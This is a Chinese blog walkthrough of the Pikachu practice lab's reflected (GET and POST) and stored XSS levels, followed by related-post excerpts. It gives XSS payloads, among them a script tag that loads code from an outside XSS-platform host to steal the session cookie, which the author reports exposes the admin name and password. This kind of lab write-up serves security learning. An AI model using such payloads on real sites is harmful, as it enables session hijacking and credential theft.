pikachu反射型xss(get、post)、储存型xss

原创 已于 2022-09-14 19:10:02 修改 · 1.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #javascript #前端

于 2022-09-05 21:16:31 首次发布
本文探讨了反射型XSS在GET请求中的利用实例,反射型和储存型XSS在POST请求中的区别,以及如何通过编码绕过防护。重点介绍了如何在实际项目中检测和防止这些攻击,包括使用Cookie的安全隐患。

pikachu

反射型xss(get)

在message后输入

<a href="javascript:alert(1)">XSS Test</a>

即可在who is后面看到按钮:XSS Test,点击即可显示出alert的内容1;

反射型xss(post)

界面是输入用户名和密码,尝试将这两栏输入JavaScript弹窗命令,不论是只输入一个表单,还是两个都输入,都没有产生反应,按提示登录后,再尝试提交js的弹窗命令:

image-20220905193244370

发现了提交的request中有cookie,message依然是urlencode的js弹窗命令:image-20220905193420545

这次post提交就可以看到提交后可以看到弹框命令可以执行了:

image-20220905193729654

在XSS平台中截取下图黄色部分代码提交post请求,代码:

<sCRiPt sRC=//uj.ci/pl5C></sCrIpT>

image-20220905194946585

查看项目内容也一样得到cookie,cookie中的admin以及pw后的urlencode编码的密码就可以被盗取:

image-20220905195212291

储存型xss

提交js命令后依然可以弹出命令

储存型xss

提交js命令后依然可以弹出命令

image-20220905202606272

PikachuXSS
weixin_48621644的博客
10-14 3383
小羊学安全 任重而道远~
Pikachu第二弹:XSS
Pisces_mango的博客
08-14 2093
一、反射型xssget) 1.输入语句,发现有长度限制,按F12,修改源码字符长度 2.输入语句 3.出现弹窗 二、反射型xsspost) 1.输入账号密码登录 2.登录XSS后台,然后搭建恶意站点 这里是以POST的方式提交的,参数内容不会出现在URL中,这时候我们不能直接把我们的恶意代码嵌入到URL中,我们需要自己搭一个恶意站点,然后在网站上放一个post表单,将存放post表单的链接发送给受害者,诱导受害者点击这个post表单会自动向漏洞服务器提交一个POST请求,实
pikachu靶场xss注入漏洞与分析测试,零基础入门到精通,收藏这篇就够了
最新发布
leah126的博客
10-30 880
*工具实战:**集中训练抓包工具(Wireshark)、渗透测试工具(Nmap)、漏洞扫描工具(Nessus 基础版)的使用,结合模拟场景练习工具应用(掌握基础扫描逻辑,为 SRC 漏扫工具进阶做准备)。实战技能训练:开展漏洞扫描、漏洞利用、电商系统渗透测试、内网渗透、权限提升(Windows、Linux)、代码审计等实战训练,结合运维中熟悉的系统环境设计测试场景(强化红蓝对抗攻击端技术能力)。红蓝对抗基础:学习护网行动背景、红蓝对抗规则(攻击范围、禁止行为)、红蓝双方角色职责(红队:模拟攻击;
pikachu漏洞练习平台XSS
m0_55854679的博客
05-09 5558
XSS案例 get方式获取cookie图解 pkxss管理后台使用介绍 在绝对路径D:\phpstudy_pro\WWW\pikachu-master\pkxss下找到pkxss管理后台。 也可以点击,pikachu靶场的左侧漏洞栏最下面的管理工具下的xss后台,并进行初始化安装。 初始化安装后,输入页面提示的用户名和密码,即可成功进入pkxss管理后台。 get方式获取cookie方法 在目录D:\phpstudy_pro\WWW\pikachu-master\pkxss\xcookie下找
Pikachu靶场:反射型XSS(post)
witwitwiter的博客
04-07 5426
Pikachu靶场:反射型XSS(post) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●反射型 交互的数据一般不会被存在在数据库里面,一次性,所见即所得,一般出现在查询类页面等。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。 跨站脚本漏洞测试流程 1.在目标站点上找到输入点,比如查询接口,留言板等; 2.输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回
pikachu反射型XSS(POST)
Lhy1963245411的博客
12-08 229
首先是登录界面,右上角提示了我们账号和密码,先进行登录。
pikachu漏洞练习第二章节反射型xssgetpost)练习收获
kaka6764的博客
08-27 2373
观察输入错误回答时弹出的提示,我们可发现弹出的提示中会把我们输入的内容(比如这里输入了错误答案x)连带提示信息一起输出在网页上。这样对比可知,利用我们保存下来的网址,我们成功利用网页xssget漏洞制造了一个执行脚本,用户点击我们保存的网址并不会像正常的网页一样显示网页提示,而是显示我们设定好的提示xssget。先在网页输入内容测试可见在输入空数据时网页提示和输入错误数据时网页提示,当根据网页提示输入kobe时,网页返回提示和图片。提交后可见网页弹出提示框,内容为xssget,即我们输入的代码内容。
pikachu靶场第五关——XSS(跨站脚本)之反射型xss(get)(附代码审计)
03-18 1941
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
pikachu-xss关卡攻略
2401_88387979的博客
12-11 931
我们首先进入pikachu环境。
pikachu靶场-XSS
braty_的博客
02-21 1845
这里是用get请求做了一个长度的限制,我们使用hackbar来进行传参,页面会弹出一个xss,证明存在xss漏洞,我们顺便讲一下 beef-xss工具。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。在输入框随便输入 11 ,F12 可以看见,11 被添加在了 标签里面(html的超链接标签)XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
Pikachu反射型XSS漏洞:从入门到“弹窗”
m0_58442919的博客
02-08 1102
反射型XSS漏洞,简单来说,就是用户输入的数据未经正确处理就被直接输出到网页上,从而导致恶意脚本执行。举个例子,如果你在一个输入框中输入一段JavaScript代码,而这段代码被原封不动地输出到网页上,那么浏览器就会执行这段代码。这就是反射型XSS漏洞的核心原理。​反射型XSS漏洞虽然看起来简单,但其危害性不容小觑。通过今天的实验,我们不仅了解了反射型XSS漏洞的定义和检测方法,还通过实际操作演示了如何利用这一漏洞。最重要的是,我们认识到前端输入过滤的重要性,以及如何通过修改前端输入限制来绕过这些过滤。
Pikachu靶场-反射型xss(get/post)
2401_83964264的博客
06-01 236
我们先登录,用户名/密码为admin/123456,登录后在输入框中以同样的方式输入js代码,submit后会显示一个弹窗,观察url,发现我们的url中没有显示出我们构造的js代码,所以当我们再次访问这个网址的时候不会像get型那样再次显示弹窗。其实这里还有一点关于cookie的内容,但是我一直获得不了cookie的数据,我的xss后台已经配置好了,可能是我还没有弄清楚post.html和cookie.php的地址到底该使用哪一个吧,解决后,继续更新。
[ pikachu ] 靶场通关之 XSS (三) --- 存储型 XSS
qq_51577576的博客
01-14 2880
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、存储型 XSS 二、过关: 1. 页面展示 2. 判断是否存在 XSS
pikachu--xss
鲨鱼辣椒的博客
05-12 5299
XSS概述 XSS全称跨站脚本(Cross Site Scripting)是web中最为常见的漏洞之一,也是危害特别大的一种漏洞,一直高居漏洞排行榜的前几名。XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容被当成正常的HTML来执行(类似于SQL注入),从而产生危害。xss漏洞危害的对象主要是前端用户,并且可以用来进行钓鱼、前端js挖矿、用户cookie获取、甚至可以结合浏览器自身的漏洞对主机进行远程控制等。 XSS(窃取cookie)攻击流程 .
pikachu靶场第六关——XSS(跨站脚本)之反射型xss(post)(附代码审计)
03-18 762
这个是登录框的代码,需要登陆成功后,才有xss,用户名:admin,密码:123456。和上一关是一样,甚至这一个还没有长度限制,只是get变成了post而已。代码的话,只是加了个cookie,和xss漏洞关系不是很大,就不讲了。
pikachu靶场通关笔记06 XSS关卡02-反射型POST
mooyuan的网络安全博客
05-28 1403
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到XSS风险的真实原因,讲解XSS的原理并进行渗透实践,本文为XSS关卡02-反射型POST的渗透部分。
pikachu靶场XSS学习
quan9i的博客
04-11 2272
反射型XSSget)存储型XSSDOM型XSSDOM型XSS -Xxss盲打xss之过滤方法二XSS之htmlspecialcharsXSS之href输出XSS之js输出
pikachu漏洞靶机之xss漏洞post提交方式
weixin_44110913的博客
03-05 713
我们要使用户提交post表单,我们需要让用户去访问一个页面,这个页面的作用就是使用户提交post表单,页面内容如下: 这段代码的意思就是,当用户访问页面的时候会自动以post的方式提交漏洞页面的cookie,提交的值就是value,在这里我们给value一段代码,代码的作用就是窃取cookie。 form表单中的action属性的意思是我们需要把数据(value)提交给action所值的页面。我们...
Pikachu靶场通关笔记--Cross-Site Scripting (XSS
weixin_45908624的博客
12-02 1501
pikachu XSS
pikachu靶场反射型xss post爆破
02-25
### Pikachu靶场反射型XSS攻击的POST请求爆破方法 #### 准备工作 为了成功实施针对Pikachu靶场中的反射型XSS攻击,了解目标环境至关重要。Pikachu是一款设计用于教育目的的应用程序,其中包含了多种常见的Web安全漏洞供学习者实践[^1]。 #### 发现潜在入口点 通过浏览器开发者工具(F12),可以观察到某些页面响应速度异常迅速,这表明可能存在不依赖服务器端验证的情况。对于验证码快速反馈的现象分析显示,其验证逻辑完全由客户端JavaScript处理而非服务端校验[^4]。 #### 构建有效载荷(Payload) 构建能够触发反射型XSS的有效载荷是关键一步。考虑到POST请求的特点以及需要绕过的机制,精心构造的数据包应当能巧妙利用这些特性来实现预期效果。例如: ```html <script>alert('XSS')</script> ``` 此段代码会在受影响用户的浏览器环境中执行并弹出警告框,证明存在可被利用的安全隐患。 #### 自动化测试过程 当手动尝试确认了某个参数确实可用于注入时,则可以通过编写脚本来自动化这一流程。Python结合`requests`库可以帮助完成这项任务: ```python import requests url = "http://example.com/vulnerable_endpoint" data = { 'param': '<script>alert("XSS")</script>' } response = requests.post(url, data=data) if "<script>" in response.text: print("[+] Potential XSS vulnerability detected!") else: print("[-] No obvious signs of XSS.") ``` 这段简单的Python脚本会向指定URL发送包含恶意HTML/JS片段作为表单字段值的HTTP POST请求,并检查返回的内容是否含有原始提交的字符串,以此判断是否存在反射型XSS风险。 #### 安全建议与预防措施 值得注意的是,在真实世界里发现任何类型的软件缺陷都应负责任地报告给开发团队以便及时修复;同时也要遵循道德准则和个人隐私保护原则,不得滥用此类技能从事非法活动。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值